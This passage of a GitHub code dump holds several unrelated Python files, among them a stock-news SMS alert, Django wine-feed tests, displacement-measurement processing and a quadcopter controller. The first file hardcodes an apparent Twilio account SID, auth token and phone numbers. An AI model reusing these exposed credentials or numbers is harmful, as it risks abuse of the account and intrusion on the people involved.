\"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://gnews.io/api/v4/search\"\n\naccount_sid = 'AC36f1949ee8c4f9f1cc9259966ec747c1'\nauth_token = \"e627c7fe6489770612c1c523c6e107c0\"\n\n\n# STEP 1: Use https://www.alphavantage.co/documentation/#daily\n# When the stock price increases/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\n\n# Get yesterday's closing stock price. Hint: You can perform list comprehensions on Python dictionaries. e.g. 
[new_value for (key, value) in dictionary.items()]\nparameters = {\n \"function\": \"TIME_SERIES_DAILY_ADJUSTED\",\n \"symbol\": STOCK_NAME,\n \"apikey\": STOCK_PRICE_API\n}\n\nresponse = requests.get(STOCK_ENDPOINT, params=parameters)\nresponse.raise_for_status()\n\nstock_data = response.json()[\"Time Series (Daily)\"]\ndata_list = [value for (key, value) in stock_data.items()]\nyesterday_data = data_list[0]\nyesterday_closing_price = yesterday_data[\"4. close\"]\n\n# Get the day before yesterday's closing stock price\nday_before_yesterday_data = data_list[1]\nday_before_yesterday_closing_price = day_before_yesterday_data[\"4. close\"]\n\n# Find the positive difference between 1 and 2. e.g. 40 - 20 = -20, but the positive difference is 20. Hint: https://www.w3schools.com/python/ref_func_abs.asp\ndifference = float(yesterday_closing_price) - \\\n float(day_before_yesterday_closing_price)\n\nup_down = None\n\nif difference > 0:\n up_down = \"🔺\"\nelse:\n up_down = \"🔻\"\n\n# Work out the percentage difference in price between closing price yesterday and closing price the day before yesterday.\npercentage_difference = round(\n (difference/float(yesterday_closing_price)) * 100)\n\n# If percentage is greater than 5 then print(\"Get News\").\nif abs(percentage_difference) > 0.1:\n news_params = {\n \"q\": COMPANY_NAME,\n \"apikey\": NEWS_API_KEY,\n }\n\n response = requests.get(NEWS_ENDPOINT, news_params)\n response.raise_for_status()\n\n data = response.json()[\"articles\"]\n first_three_articles = [value for value in data[:3]]\n\n formatted_articles = [\n f\"{STOCK_NAME}: {up_down}{percentage_difference}%\\nHeadline: {article['title']}\\nBrief: {article['description']}\" for article in first_three_articles]\n for article in formatted_articles:\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=article,\n from_='+12706068755',\n to='+256781876735'\n )\n print(message.status)\n","repo_name":"wakabibrian/100DaysOfCodeChallenge_Python","sub_path":"Day36/day36.py","file_name":"day36.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71990393073","text":"import os\nfrom unittest import skip\nfrom decimal import Decimal\nfrom django.test import SimpleTestCase, TestCase\n\nfrom integrations.data_feed import WineData, apply_update, get_wine_for_data\nfrom integrations.port2port import get_port2port_data, PORT2PORT_MERCHANT_NAME, update_all, \\\n update_minimum_purchase_unit\n\nfrom wine.models import MerchantWine, Merchant\nfrom wine.tests.test_util import get_a_new_wine_vintage\n\n\nclass Port2PortFeedTest(SimpleTestCase):\n\n def test_parse_feed(self):\n with open(os.path.join(os.path.dirname(__file__), 'data', 'port2port-feed.xml')) as f:\n raw_feed = f.read()\n\n data = list(get_port2port_data(raw_feed))\n self.assertEqual(3, len(data))\n wine_info = data[0]\n self.assertEqual('2261', wine_info.id)\n self.assertEqual('Arendsig 1000 Vines Viognier 2016', wine_info.name)\n self.assertEqual('https://www.port2port.wine/buy-wine/arendsig/1000-vines-viognier-2016',\n wine_info.url)\n self.assertEqual('56', wine_info.stock_amount)\n self.assertEqual('150.00', wine_info.price)\n # test unicode\n self.assertEqual('https://www.port2port.wine/buy-wine/môreson/cabernet-franc-2015', data[2].url)\n\n\nclass Port2PortFeedDbTest(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super(Port2PortFeedDbTest, cls).setUpClass()\n cls.merchant = 
Merchant.objects.create(name=PORT2PORT_MERCHANT_NAME, priority=1)\n cls.wine_vintage = get_a_new_wine_vintage()\n cls.merchant_wine = MerchantWine.objects.create(\n merchant=cls.merchant, wine_vintage=cls.wine_vintage, minimum_purchase_unit=1,\n external_id='test_id', url='http://test.com/wine-url',\n )\n\n def test_get_no_match(self):\n self.assertEqual(None, get_wine_for_data(_make_wine_data()))\n self.assertEqual(None, get_wine_for_data(_make_wine_data(url='missing', id='missing')))\n\n def test_get_by_id(self):\n self.assertEqual(self.merchant_wine, get_wine_for_data(_make_wine_data(id=self.merchant_wine.external_id)))\n\n def test_get_by_url(self):\n self.assertEqual(self.merchant_wine, get_wine_for_data(_make_wine_data(url=self.merchant_wine.url)))\n\n def test_get_wrong_merchant(self):\n bogus_merchant_wine = MerchantWine.objects.create(\n merchant=Merchant.objects.create(name='bogus', priority=1),\n wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id='bogus_id', url='http://test.com/bogus-wine-url'\n )\n self.addCleanup(bogus_merchant_wine.delete)\n self.assertEqual(None, get_wine_for_data(_make_wine_data(id=bogus_merchant_wine.external_id,\n url=bogus_merchant_wine.url)))\n\n def test_set_external_id_if_null(self):\n url = 'test_set_external_id_if_null_url'\n id = 'test_set_external_id_if_null_id'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n url=url,\n )\n apply_update(_make_wine_data(id=id, url=url))\n wine = MerchantWine.objects.get(pk=wine.pk)\n self.assertEqual(id, wine.external_id)\n\n def test_change_url(self):\n id = 'test_change_url_id'\n url = 'test_change_url'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id=id, url=url, available=False,\n )\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, url=url)))\n\n update_url = 'url_changed'\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, url=update_url)))\n self.assertEqual(update_url, MerchantWine.objects.get(pk=wine.pk).url)\n\n def test_allow_changing_external_id(self):\n id = 'test_allow_changing_external_id'\n apply_update(_make_wine_data(id=id, url=self.merchant_wine.url))\n wine = MerchantWine.objects.get(pk=self.merchant_wine.pk)\n self.assertEqual(id, wine.external_id)\n\n def test_set_available(self):\n id = 'test_set_available'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n available=False, external_id=id,\n )\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id)))\n self.assertFalse(MerchantWine.objects.get(pk=wine.pk).available)\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='0')))\n self.assertFalse(MerchantWine.objects.get(pk=wine.pk).available)\n\n # set some stock and confirm changed\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='10')))\n self.assertTrue(MerchantWine.objects.get(pk=wine.pk).available)\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='20')))\n self.assertTrue(MerchantWine.objects.get(pk=wine.pk).available)\n\n # set back and confirm changed again\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='0')))\n self.assertFalse(MerchantWine.objects.get(pk=wine.pk).available)\n\n def test_change_price(self):\n id = 'test_change_price_id'\n wine = 
MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id=id, price=Decimal(150.0), available=False,\n )\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, price='150')))\n\n updated_price = '200'\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, price=updated_price)))\n self.assertEqual(Decimal(updated_price), MerchantWine.objects.get(pk=wine.pk).price)\n\n def test_minimum_purchase_unit(self):\n id = 'test_minimum_purchase_unit_id'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id=id, price=Decimal(200.0), available=False,\n )\n wine, work_done = apply_update(_make_wine_data(id=id, price='100'),\n custom_processor=update_minimum_purchase_unit)\n self.assertTrue('Set minimum purchase unit from 1 to 6' in work_done)\n self.assertEqual(6, MerchantWine.objects.get(pk=wine.pk).minimum_purchase_unit)\n\n # changing it back should explicitly not update it\n wine, work_done = apply_update(_make_wine_data(id=id, price='180'),\n custom_processor=update_minimum_purchase_unit)\n self.assertTrue('Set minimum purchase unit from 6 to 1' not in work_done)\n self.assertEqual(6, MerchantWine.objects.get(pk=wine.pk).minimum_purchase_unit)\n\n @skip('Comment out the decorator to run this test.')\n def test_print_results(self):\n update_all(debug=True)\n\n\ndef _make_wine_data(*args, **kwargs):\n kwargs['merchant_name'] = PORT2PORT_MERCHANT_NAME\n return WineData(*args, **kwargs)\n","repo_name":"FindWine/findwine","sub_path":"integrations/tests/test_port2port.py","file_name":"test_port2port.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31511080473","text":"\"\"\"\nObtain the displacement measurements from digital image correlation results.\n\"\"\"\n\nimport os\nimport time\nimport scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom examples.utility import apply_mean_filter\n\n\nCURRENT_DIRECTORY = os.path.dirname(os.path.relpath(__file__))\nCURRENT_DIRECTORY_NAME = os.path.basename(CURRENT_DIRECTORY)\n\nPARENT_DIRECTORY = os.path.dirname(CURRENT_DIRECTORY)\nPARENT_DIRECTORY_NAME = os.path.basename(PARENT_DIRECTORY)\n\n# SUBDIRECTORY_INPUT_DATA = os.path.join(\"datafiles_unprocessed\", \"displacement\", \"dic_1\")\nSUBDIRECTORY_INPUT_DATA = os.path.join(\"datafiles_unprocessed\", \"displacement\", \"dic_2\")\nDIRECTORY_INPUT_DATA = os.path.join(CURRENT_DIRECTORY, SUBDIRECTORY_INPUT_DATA)\n\n# SUBDIRECTORY_OUTPUT_DATA = os.path.join(\"datafiles_processed\", \"displacement\", \"dic_1\")\nSUBDIRECTORY_OUTPUT_DATA = os.path.join(\"datafiles_processed\", \"displacement\", \"dic_2\")\nDIRECTORY_OUTPUT_DATA = os.path.join(CURRENT_DIRECTORY, SUBDIRECTORY_OUTPUT_DATA)\nDIRECTORY_OUTPUT_FIGURES = os.path.join(CURRENT_DIRECTORY, \"results\")\n\n\nPLOT_DATA = True\nSAVE_PLOTS = False\nWRITE_DATA = False\n\nEXTENSIOMETER_PAD_WIDTH = 8.0 # Independent of experiment\nEXTENSIOMETER_WINDOW_WIDTH = 24.0 # Independent of experiment\n# EXTENSIOMETER_PAD_DISTANCE = 36.5 # Depends on experiment (NOTE: Not used)\n\nSCALE_DATA_FROM_PIXELS_TO_MM = True\nSET_DISPLACEMENTS_RELATIVE_TO_FIXED_PAD = True\nSET_COORDINATES_RELATIVE_TO_MOVING_PAD = True\n\nDISCARD_SPURIOUS_POINTS = True\nINDICES_SPURIOUS_POINTS = [1, 18, 23, 24, 30, 42, 55, 95, 99, 136, 141, 146,\n 161, 168, 169, 171, 180, 181, 182, 198, 204, 209, 216, 243, 245, 252, 
268,\n 269, 279, 281, 285, 295, 307, 365, 388, 404, 433, 517, 518, 545, 557, 608,\n 627, 646, 647, 654, 655, 656, 659, 660, 664, 665, 666, 678]\n\nAPPLY_TEMPORAL_FILTER = True\nTEMPORAL_FILTERING_TIMES = 15\nTEMPORAL_FILTER_KERNELS = [\n # np.ones((9,),float),\n # np.ones((7,),float),\n np.ones((5,),float),\n np.ones((3,),float)] # Flat-top filters\n\n\ndef read_data_files(file_xt, file_yt, delimiter=None):\n\n xt = np.loadtxt(file_xt, dtype=float, delimiter=delimiter, ndmin=2)\n yt = np.loadtxt(file_yt, dtype=float, delimiter=delimiter, ndmin=2)\n\n if xt.shape != yt.shape:\n raise TypeError('Different shapes of arrays `xt` and `yt`.')\n\n nt = xt.shape[1]\n\n xt = np.split(xt, nt, axis=1)\n yt = np.split(yt, nt, axis=1)\n\n xt = [np.concatenate(xt_i, axis=1)\n for xt_i in zip(xt, yt)]\n\n return xt\n\n\ndef write_data_files(dct):\n\n if not os.path.isdir(DIRECTORY_OUTPUT_DATA):\n os.makedirs(DIRECTORY_OUTPUT_DATA)\n\n for key, val in dct.items():\n if isinstance(val, (list, tuple)):\n if not all(isinstance(val_i, np.ndarray) for val_i in val):\n raise RuntimeError('Expected the sequence to contain arrays.')\n for i, val_i in enumerate(val):\n np.savetxt(os.path.join(DIRECTORY_OUTPUT_DATA, key+f'_{i:04d}.out'), val_i)\n else:\n np.savetxt(os.path.join(DIRECTORY_OUTPUT_DATA, key+'.out'), val)\n\n\n### Read measurements\n\nx0_dic = read_data_files(\n os.path.join(DIRECTORY_INPUT_DATA, 'x0.dat'),\n os.path.join(DIRECTORY_INPUT_DATA, 'y0.dat'))\nxt_dic = read_data_files(\n os.path.join(DIRECTORY_INPUT_DATA, 'xt.dat'),\n os.path.join(DIRECTORY_INPUT_DATA, 'yt.dat'))\n\n# x0_ref_1 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'x0_ref_1.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'y0_ref_1.dat'))\n# xt_ref_1 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'xt_ref_1.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'yt_ref_1.dat'))\n\n# x0_ref_2 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'x0_ref_2.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'y0_ref_2.dat'))\n# xt_ref_2 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'xt_ref_2.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'yt_ref_2.dat'))\n\npoint_spacing_x_axis = 10\n\nindices_points_left_edge = np.flatnonzero(x0_dic[0][:,0]\n < x0_dic[0][:,0].min() + point_spacing_x_axis)\n\nindices_points_right_edge = np.flatnonzero(x0_dic[0][:,0]\n > x0_dic[0][:,0].max() - point_spacing_x_axis)\n\nx0_ref_1 = [xs[indices_points_left_edge].copy() for xs in x0_dic]\nxt_ref_1 = [xs[indices_points_left_edge].copy() for xs in xt_dic]\n\nx0_ref_2 = [xs[indices_points_right_edge].copy() for xs in x0_dic]\nxt_ref_2 = [xs[indices_points_right_edge].copy() for xs in xt_dic]\n\nif x0_dic[0].shape != xt_dic[0].shape:\n raise RuntimeError\n\nif x0_ref_1[0].shape != xt_ref_1[0].shape:\n raise RuntimeError\n\nif x0_ref_2[0].shape != xt_ref_2[0].shape:\n raise RuntimeError\n\nxt_dic.insert(0, x0_dic[0])\nxt_ref_1.insert(0, x0_ref_1[0])\nxt_ref_2.insert(0, x0_ref_2[0])\n\ndel x0_dic\ndel x0_ref_1\ndel x0_ref_2\n\nnumber_of_measurements = len(xt_dic)\n\nif len(xt_ref_1) != number_of_measurements:\n raise RuntimeError('Inconsistent numbers of measurements.')\n\nif len(xt_ref_2) != number_of_measurements:\n raise RuntimeError('Inconsistent numbers of measurements.')\n\nxt_dic = xt_dic[:number_of_measurements]\nxt_ref_1 = xt_ref_1[:number_of_measurements]\nxt_ref_2 = xt_ref_2[:number_of_measurements]\n\n\n### Temporal filtering\n\nassert isinstance(xt_dic, list)\nassert isinstance(xt_ref_1, list)\nassert isinstance(xt_ref_2, list)\n\nif 
APPLY_TEMPORAL_FILTER:\n for w_i in TEMPORAL_FILTER_KERNELS:\n for _ in range(TEMPORAL_FILTERING_TIMES):\n apply_mean_filter(w_i, xt_dic)\n apply_mean_filter(w_i, xt_ref_1)\n apply_mean_filter(w_i, xt_ref_2)\n\n\n### Scale measurements from px to mm\n\nif SCALE_DATA_FROM_PIXELS_TO_MM:\n\n # NOTE: Using the vertical scale rather than the horizontal scale is more robust\n # because the extensometer width is known whereas the pad distance is arbitrary.\n\n _dy_ref_1 = xt_ref_1[0][:,1].max() - xt_ref_1[0][:,1].min()\n _dy_ref_2 = xt_ref_2[0][:,1].max() - xt_ref_2[0][:,1].min()\n\n _dy = (_dy_ref_1 + _dy_ref_2) * 0.5\n scale = EXTENSIOMETER_PAD_WIDTH / _dy\n\n for _xs in xt_dic:\n _xs *= scale\n\n for _xs in xt_ref_1:\n _xs *= scale\n\n for _xs in xt_ref_2:\n _xs *= scale\n\n\n### Compute pad positions\n\nindex_ymax = np.argmax(xt_ref_1[0][:,1])\nindex_ymin = np.argmin(xt_ref_1[0][:,1])\n\nxt_pad_mov = [(xs[index_ymax] + xs[index_ymin]) * 0.5 for xs in xt_ref_1]\n\nindex_ymax = np.argmax(xt_ref_2[0][:,1])\nindex_ymin = np.argmin(xt_ref_2[0][:,1])\n\nxt_pad_fix = [(xs[index_ymax] + xs[index_ymin]) * 0.5 for xs in xt_ref_2]\n\n\n### Set measurements relative to fixed pad\n\nif SET_DISPLACEMENTS_RELATIVE_TO_FIXED_PAD:\n\n for _xs_dic, _xi_pad_fix in zip(xt_dic, xt_pad_fix):\n _xs_dic -= _xi_pad_fix\n\n for _xs_pad_mov, _xi_pad_fix in zip(xt_pad_mov, xt_pad_fix):\n _xs_pad_mov -= _xi_pad_fix\n\n for _xi in xt_pad_fix:\n _xi[:] = 0.0\n\n\n### Set initial coordinates relative to moving pad\n\nif SET_COORDINATES_RELATIVE_TO_MOVING_PAD:\n\n _xi_pad_mov = xt_pad_mov[0].copy()\n\n for _xs in xt_dic:\n _xs -= _xi_pad_mov\n\n for _xs in xt_pad_mov:\n _xs -= _xi_pad_mov\n\n for _xs in xt_pad_fix:\n _xs -= _xi_pad_mov\n\n\n### Remove spurious points\n\ndef get_indices_compliment(indices, maxsize):\n mask = np.ones((maxsize,), bool)\n mask[indices] = False\n return np.flatnonzero(mask)\n\nindices_points_genuine = list(range(len(xt_dic[0])))\nindices_points_spurious = INDICES_SPURIOUS_POINTS\n\nif DISCARD_SPURIOUS_POINTS:\n indices_points_genuine = get_indices_compliment(\n indices_points_spurious, len(xt_dic[0]))\n\nxt_dic_spr = []\n\nfor xi_dic in xt_dic:\n xt_dic_spr.append(xi_dic[indices_points_spurious,:].copy())\n\nif DISCARD_SPURIOUS_POINTS:\n for i, xi_dic in enumerate(xt_dic):\n xt_dic[i] = xi_dic[indices_points_genuine,:].copy()\n\n\n### Displacements\n\nx0_dic = xt_dic[0].copy()\nx0_pad_mov = xt_pad_mov[0].copy()\nx0_pad_fix = xt_pad_fix[0].copy()\n\nut_dic = [xs - x0_dic for xs in xt_dic]\nut_pad_mov = [xs - x0_pad_mov for xs in xt_pad_mov]\nut_pad_fix = [xs - x0_pad_fix for xs in xt_pad_fix]\n\n\n### Extensometer dimensions\n\nextensiometer_window_width = EXTENSIOMETER_WINDOW_WIDTH\nextensiometer_pad_distance = x0_pad_fix[0] - x0_pad_mov[0]\n\n\n### Export these data\n\nmeasurements = {\n 'x_dic': x0_dic,\n 'u_dic': ut_dic,\n 'x_pad_mov': np.array(x0_pad_mov, ndmin=2),\n 'u_pad_mov': np.array(ut_pad_mov, ndmin=2),\n 'x_pad_fix': np.array(x0_pad_fix, ndmin=2),\n 'u_pad_fix': np.array(ut_pad_fix, ndmin=2),\n }\n\n\n### Plotting\n\ndef plot_data_frame(index=-1, title=None, ax=None, annotate=False):\n\n if ax is None:\n fh = plt.figure(); fh.clear()\n ax = fh.add_subplot(1,1,1)\n\n elif not isinstance(ax, plt.Axes):\n raise TypeError('Parameter `ax` must be of type `plt.Axes`.')\n\n ax.scatter(xt_dic[0][:,0],\n xt_dic[0][:,1],\n c=\"k\", s=10, marker='.')\n\n ax.scatter(xt_dic[index][:,0],\n xt_dic[index][:,1],\n c='r', s=10, marker='o', alpha=0.5)\n\n if annotate:\n\n ax.scatter(xt_dic_spr[0][:,0],\n 
xt_dic_spr[0][:,1],\n                   c='b', s=20, marker='+')\n\n        ax.scatter(xt_dic_spr[index][:,0],\n                   xt_dic_spr[index][:,1],\n                   c='b', s=20, marker='x')\n\n        for i, xi_i in zip(indices_points_genuine, xt_dic[index]):\n            ax.annotate(i, xi_i, fontsize='small')\n\n        for i, xi_i in zip(indices_points_spurious, xt_dic_spr[index]):\n            ax.annotate(i, xi_i, fontsize='small')\n\n    ax.legend(['undeformed', 'deformed'])\n\n    if title is not None:\n        ax.set_title(title)\n\n    ax.set_xlabel('x (mm)')\n    ax.set_ylabel('y (mm)')\n\n    ax.axis('equal')\n\n    return ax\n\n\ndef plot_data_frames(title=None, duration=0.05, margin=0.05,\n                     exclude_registration_points=False, annotate=False):\n\n    fh = plt.figure(title)\n    fh.clear()\n    ax = fh.add_subplot(1,1,1)\n\n    if exclude_registration_points:\n        xt_ends = [xt_dic[0], xt_dic[-1]]\n    else:\n        xt_ends = [np.concatenate([a[None,:], b[None,:], c], axis=0)\n                   for a, b, c in zip((xt_pad_mov[0], xt_pad_mov[-1]),\n                                      (xt_pad_fix[0], xt_pad_fix[-1]),\n                                      (xt_dic[0], xt_dic[-1]))]\n\n    xmin = min(xi[:,0].min() for xi in xt_ends)\n    ymin = min(xi[:,1].min() for xi in xt_ends)\n    xmax = max(xi[:,0].max() for xi in xt_ends)\n    ymax = max(xi[:,1].max() for xi in xt_ends)\n\n    m = max(xmax-xmin, ymax-ymin) * margin\n    axis_limits = xmin-m, xmax+m, ymin-m, ymax+m\n\n    for index in range(number_of_measurements):\n\n        ax.clear()\n\n        plot_data_frame(index, title, ax, annotate)\n\n        ax.axis(axis_limits)\n\n        fh.canvas.draw()\n        fh.canvas.flush_events()\n\n        time.sleep(duration)\n\n    return ax\n\n\ndef save_data_frame(fh, name=\"Untitled\"):\n\n    if not isinstance(fh, plt.Figure):\n        raise TypeError('Parameter `fh` must be of type `plt.Figure`.')\n\n    if not os.path.isdir(DIRECTORY_OUTPUT_FIGURES):\n        os.makedirs(DIRECTORY_OUTPUT_FIGURES)\n\n    savepath = os.path.join(DIRECTORY_OUTPUT_FIGURES, name)\n\n    plt.savefig(savepath+'.png', dpi=300)\n    plt.savefig(savepath+'.svg')\n    plt.savefig(savepath+'.pdf')\n\n\nif __name__ == \"__main__\":\n\n    plt.interactive(True)\n    plt.close('all')\n    plt.show()\n\n    FRAME_INDEX = -1\n\n    if PLOT_DATA or SAVE_PLOTS:\n\n        title = \"Displacement Field Measurement (Last Snapshot)\"\n\n        ax = plot_data_frame(FRAME_INDEX, title)\n\n        fh = ax.get_figure()\n\n        if SAVE_PLOTS:\n\n            file_name = title.lower().strip('()')\n            for c in (' (', ') ', '(', ')', ' '):\n                file_name = file_name.replace(c, '_')\n\n            save_data_frame(fh, file_name)\n\n        if not PLOT_DATA:\n            plt.close(fh)  # figures are closed via pyplot; Figure objects have no close() method\n\n    if WRITE_DATA:\n        write_data_files({\n            'xt_dic': xt_dic,\n            'xt_pad_mov': np.array(xt_pad_mov, ndmin=2),\n            'xt_pad_fix': np.array(xt_pad_fix, ndmin=2),\n            })\n","repo_name":"aflahelouneg/inverse_identification_soft_tissue","sub_path":"examples/human_skin/bimaterial/data/displacement.py","file_name":"displacement.py","file_ext":"py","file_size_in_byte":11948,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"39"} +{"seq_id":"34210328763","text":"length, width, height = map(int, input().split())\nn = int(input())\ncube = [list(map(int, input().split())) for _ in range(n)]\nvolume = length * width * height\nans = 0\nbefore = 0\ncube.sort(reverse=True)\n\nfor w, cnt in cube:\n    before <<= 3\n    v = 2 ** w\n    maxCnt = (length // v) * (width // v) * (height // v) - before\n    maxCnt = min(cnt, maxCnt)\n    ans += maxCnt\n    before += maxCnt\n\nif before == volume:\n    print(ans)\nelse:\n    
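# the given cubes cannot fill the box exactly\n    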
print(-1)","repo_name":"Sangmeeeee/SSAFY","sub_path":"week7/yein/problem3/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"39553365410","text":"from hubsan import Hubsan\nimport RPi.GPIO as GPIO\nimport a7105\nimport curses\nimport time\n\nprecision = 0.02\nquad = None\nselection = 0\n\ndef display(stdscr):\n stdscr.clear()\n stdscr.addstr(0, 0, 'Throttle:')\n stdscr.addstr(0, 11, '< {0:.2f} >'.format(quad.throttle), curses.A_REVERSE if selection == 0 else 0)\n stdscr.addstr(1, 0, 'Yaw:')\n stdscr.addstr(1, 11, '< {0:.2f} >'.format(quad.yaw), curses.A_REVERSE if selection == 1 else 0)\n stdscr.addstr(2, 0, 'Pitch:')\n stdscr.addstr(2, 11, '< {0:.2f} >'.format(quad.pitch), curses.A_REVERSE if selection == 2 else 0)\n stdscr.addstr(3, 0, 'Roll:')\n stdscr.addstr(3, 11, '< {0:.2f} >'.format(quad.roll), curses.A_REVERSE if selection == 3 else 0)\n stdscr.addstr(4, 0, 'Leds:')\n stdscr.addstr(4, 11, '< {0} >'.format(quad.leds), curses.A_REVERSE if selection == 4 else 0)\n stdscr.addstr(5, 0, 'Flips:')\n stdscr.addstr(5, 11, '< {0} >'.format(quad.flips), curses.A_REVERSE if selection == 5 else 0)\n\n stdscr.refresh()\n\ndef main(stdscr):\n global selection\n curses.curs_set(0)\n stdscr.nodelay(True)\n while True:\n display(stdscr)\n event = stdscr.getch()\n\n if event == curses.KEY_DOWN:\n if selection < 5: selection += 1\n elif event == curses.KEY_UP:\n if selection > 0: selection -= 1\n elif event == curses.KEY_LEFT:\n if selection == 0: quad.throttle -= precision\n if selection == 1: quad.yaw -= precision\n if selection == 2: quad.pitch -= precision\n if selection == 3: quad.roll -= precision\n if selection == 4: quad.leds = not quad.leds\n if selection == 5: quad.flips = not quad.flips\n elif event == curses.KEY_RIGHT:\n if selection == 0: quad.throttle += precision\n if selection == 1: quad.yaw += precision\n if selection == 2: quad.pitch += precision\n if selection == 3: quad.roll += precision\n if selection == 4: quad.leds = not quad.leds\n if selection == 5: quad.flips = not quad.flips\n elif event == ord('q'):\n break\n elif event == ord('s'):\n # emergency stop\n quad.throttle = 0.0\n quad.yaw = 0.5\n quad.pitch = 0.5\n quad.roll = 0.5\n quad.leds = True\n quad.flips = False\n\n\nif __name__ == \"__main__\":\n a7105.init()\n quad = Hubsan()\n quad.bind()\n curses.wrapper(main)\n quad.stop()\n","repo_name":"phito/rpi-hubsanx4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"72109531633","text":"# coding:utf-8\n\n\"\"\"\n20. 
Valid Parentheses\n\nGiven a string containing just the characters '(',')','{','}','[',']', determine whether the string is valid.\n\nA valid string must satisfy:\n\nOpen brackets must be closed by the same type of bracket.\nOpen brackets must be closed in the correct order.\nNote that an empty string is considered valid.\n\nExample 1:\n\nInput: \"()\"\nOutput: true\nExample 2:\n\nInput: \"()[]{}\"\nOutput: true\nExample 3:\n\nInput: \"(]\"\nOutput: false\nExample 4:\n\nInput: \"([)]\"\nOutput: false\nExample 5:\n\nInput: \"{[]}\"\nOutput: true\n\n\"\"\"\n\n\ndef isValid(s):\n    # create an empty stack\n    stack = []\n\n    mapping = {')': '(', '}': '{', ']': '['}\n\n    for char in s:\n        # if it is a closing bracket\n        if char in mapping:\n            # if the stack is not empty, pop its top element\n            # Otherwise assign a dummy value of '#' to the top_element variable\n            top_element = stack.pop() if stack else '#'\n\n            # mismatch when the expected opening bracket differs from the popped top element\n            if mapping[char] != top_element:\n                return False\n\n        # if it is an opening bracket, push it onto the stack\n        else:\n            stack.append(char)\n\n    # if the stack is empty, not stack returns True\n    # if the stack is not empty, not stack returns False\n    return not stack\n\n\ntest_str = \"{[]}()\"\nresult = isValid(test_str)\nprint(result)\n","repo_name":"yeqianzhi/LeetCode_2","sub_path":"Stack/Easy/_20_ValidParentheses.py","file_name":"_20_ValidParentheses.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40732220250","text":"# Programming Assignment-2: Letters\r\n\r\n'''\r\n\tQuestion : Write a program that accepts a sentence and calculates the number of upper case letters and lower case letters.\r\n'''\r\n\r\n# Code\r\n\r\ns=input().strip()\r\nu=0;l=0\r\nfor i in s:\r\n    if i.isupper():u+=1\r\n    elif i.islower():l+=1\r\nprint(u,l)","repo_name":"avinash3699/NPTEL-The-Joy-of-Computing-using-Python","sub_path":"Week 12/Programming Assignment 2 Letters.py","file_name":"Programming Assignment 2 Letters.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"21242973944","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 14 13:08:48 2019\n\n@author: Nataly\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport glob\nfrom yolovoc import yolo2voc\nfrom readboxes import read_boxes\nfrom matplotlib import pyplot as plt\nfrom rOI import ROI\nfrom skimage.feature import greycomatrix, greycoprops\nimport skimage.feature\nfrom scipy.stats import kurtosis\nimport statistics as stats\nimport pywt\nimport pywt.data\n\n#tamañoA = []\n#tamañoB = []\ndef Fourier(inA):\n    f = np.fft.fft2(inA)\n    fshift = np.fft.fftshift(f)\n    fourier = 20*np.log(np.abs(fshift))\n    fourier=fourier.astype(np.uint8)\n    return fourier \n    \ndef GLCM (imA):\n    a=int(np.max(imA))\n    g = skimage.feature.greycomatrix(imA, [1], [0], levels=a+1, symmetric=False, normed=True) \n    contraste=skimage.feature.greycoprops(g, 'contrast')[0][0]\n    energia=skimage.feature.greycoprops(g, 'energy')[0][0]\n    homogeneidad=skimage.feature.greycoprops(g, 'homogeneity')[0][0]\n    correlacion=skimage.feature.greycoprops(g, 'correlation')[0][0]\n    disimi= greycoprops(g, 'dissimilarity') \n    ASM= greycoprops(g, 'ASM')\n    entropia=skimage.measure.shannon_entropy(g) \n    return g,contraste,energia,homogeneidad, correlacion, disimi, ASM,entropia\n#  